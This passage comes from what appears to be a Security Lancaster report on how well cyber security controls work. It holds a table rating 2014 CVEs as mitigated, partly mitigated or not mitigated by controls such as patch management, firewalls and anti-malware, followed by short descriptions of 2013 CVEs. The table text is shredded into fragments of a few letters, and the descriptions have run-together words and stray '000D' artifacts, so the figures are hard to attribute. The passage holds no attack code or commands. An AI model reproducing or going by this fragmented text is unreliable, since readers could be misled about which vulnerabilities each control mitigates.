are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
